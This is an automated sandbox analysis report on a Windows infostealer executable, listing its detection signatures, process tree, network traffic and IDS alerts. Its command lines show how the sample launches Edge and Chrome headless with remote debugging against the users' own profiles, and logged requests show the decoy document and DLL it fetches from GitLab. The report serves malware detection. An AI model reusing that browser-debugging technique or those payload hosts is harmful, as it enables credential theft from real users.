Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
StL9joVVcT.exe

Overview

General Information

Sample name:StL9joVVcT.exe
renamed because original name is a hash value
Original sample name:61fde75c7a98bc432a0539a559ac0078bc91f69bccf0d899f59e3bcdcfad0471.exe
Analysis ID:1590651
MD5:aca235134c2d590750cf0710f9324b77
SHA1:0486e4f1514c6133519d8d4924f2009097c0de04
SHA256:61fde75c7a98bc432a0539a559ac0078bc91f69bccf0d899f59e3bcdcfad0471
Tags:bot7135076584exeuser-JAMESWT_MHT
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected Telegram Recon
AI detected suspicious sample
Drops password protected ZIP file
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • StL9joVVcT.exe (PID: 4924 cmdline: "C:\Users\user\Desktop\StL9joVVcT.exe" MD5: ACA235134C2D590750CF0710F9324B77)
    • msedge.exe (PID: 516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 2276 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1328 --field-trial-handle=1468,i,7079440847990403330,1816915904370043834,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • chrome.exe (PID: 3420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9478 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 5552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1592 --field-trial-handle=1468,i,8309244581088940151,1706342742700120984,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • WINWORD.EXE (PID: 7180 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
StL9joVVcT.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: StL9joVVcT.exe PID: 4924JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\StL9joVVcT.exe", ParentImage: C:\Users\user\Desktop\StL9joVVcT.exe, ParentProcessId: 4924, ParentProcessName: StL9joVVcT.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disab
      Sigma detected: Browser Execution In Headless Mode
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\StL9joVVcT.exe", ParentImage: C:\Users\user\Desktop\StL9joVVcT.exe, ParentProcessId: 4924, ParentProcessName: StL9joVVcT.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disab
      Sigma detected: Browser Started with Remote Debugging
      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\StL9joVVcT.exe", ParentImage: C:\Users\user\Desktop\StL9joVVcT.exe, ParentProcessId: 4924, ParentProcessName: StL9joVVcT.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disab

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-14T12:48:03.309719+010028033053Unknown Traffic192.168.2.649709172.65.251.78443TCP
      2025-01-14T12:48:03.324722+010028033053Unknown Traffic192.168.2.649715142.250.185.78443TCP
      2025-01-14T12:48:03.326085+010028033053Unknown Traffic192.168.2.649717142.250.185.78443TCP
      2025-01-14T12:48:03.327024+010028033053Unknown Traffic192.168.2.649712142.250.185.78443TCP
      2025-01-14T12:48:03.327171+010028033053Unknown Traffic192.168.2.649713142.250.185.78443TCP
      2025-01-14T12:48:03.332261+010028033053Unknown Traffic192.168.2.649714142.250.185.78443TCP
      2025-01-14T12:48:03.339541+010028033053Unknown Traffic192.168.2.649720142.250.185.78443TCP
      2025-01-14T12:48:03.348019+010028033053Unknown Traffic192.168.2.649716142.250.185.78443TCP
      2025-01-14T12:48:03.351651+010028033053Unknown Traffic192.168.2.649719142.250.185.78443TCP
      2025-01-14T12:48:03.352188+010028033053Unknown Traffic192.168.2.649721142.250.185.78443TCP
      2025-01-14T12:48:03.359872+010028033053Unknown Traffic192.168.2.649718142.250.185.78443TCP
      2025-01-14T12:48:04.300616+010028033053Unknown Traffic192.168.2.649723142.250.185.228443TCP
      2025-01-14T12:48:04.310552+010028033053Unknown Traffic192.168.2.649725142.250.185.228443TCP
      2025-01-14T12:48:04.312699+010028033053Unknown Traffic192.168.2.649722142.250.185.228443TCP
      2025-01-14T12:48:04.317245+010028033053Unknown Traffic192.168.2.649724142.250.185.228443TCP
      2025-01-14T12:48:04.342251+010028033053Unknown Traffic192.168.2.649726142.250.185.228443TCP
      2025-01-14T12:48:04.448197+010028033053Unknown Traffic192.168.2.649729142.250.185.228443TCP
      2025-01-14T12:48:04.685071+010028033053Unknown Traffic192.168.2.649727142.250.185.228443TCP
      2025-01-14T12:48:05.033300+010028033053Unknown Traffic192.168.2.649731142.250.185.228443TCP
      2025-01-14T12:48:05.251412+010028033053Unknown Traffic192.168.2.649728142.250.185.228443TCP
      2025-01-14T12:48:05.331212+010028033053Unknown Traffic192.168.2.649730142.250.185.228443TCP
      2025-01-14T12:48:28.792313+010028033053Unknown Traffic192.168.2.649864172.65.251.78443TCP
      2025-01-14T12:48:31.295376+010028033053Unknown Traffic192.168.2.649884104.26.12.205443TCP
      2025-01-14T12:48:31.906013+010028033053Unknown Traffic192.168.2.649886104.26.12.205443TCP
      2025-01-14T12:48:32.381098+010028033053Unknown Traffic192.168.2.649892208.95.112.180TCP
      2025-01-14T12:48:32.991663+010028033053Unknown Traffic192.168.2.649898104.26.12.205443TCP
      2025-01-14T12:48:33.613213+010028033053Unknown Traffic192.168.2.649904104.26.12.205443TCP
      2025-01-14T12:48:34.102729+010028033053Unknown Traffic192.168.2.649905208.95.112.180TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.2% probability
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49726 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49864 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49884 version: TLS 1.2
      Source: StL9joVVcT.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256r source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256@ source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.Diagnostics.Process.ni.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdbSHA256 source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\Projects\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: StL9joVVcT.exe, 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4D9000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.IO.Compression.ni.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49892 -> 208.95.112.1:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49905 -> 208.95.112.1:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49713 -> 142.250.185.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49719 -> 142.250.185.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49717 -> 142.250.185.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49721 -> 142.250.185.78:443
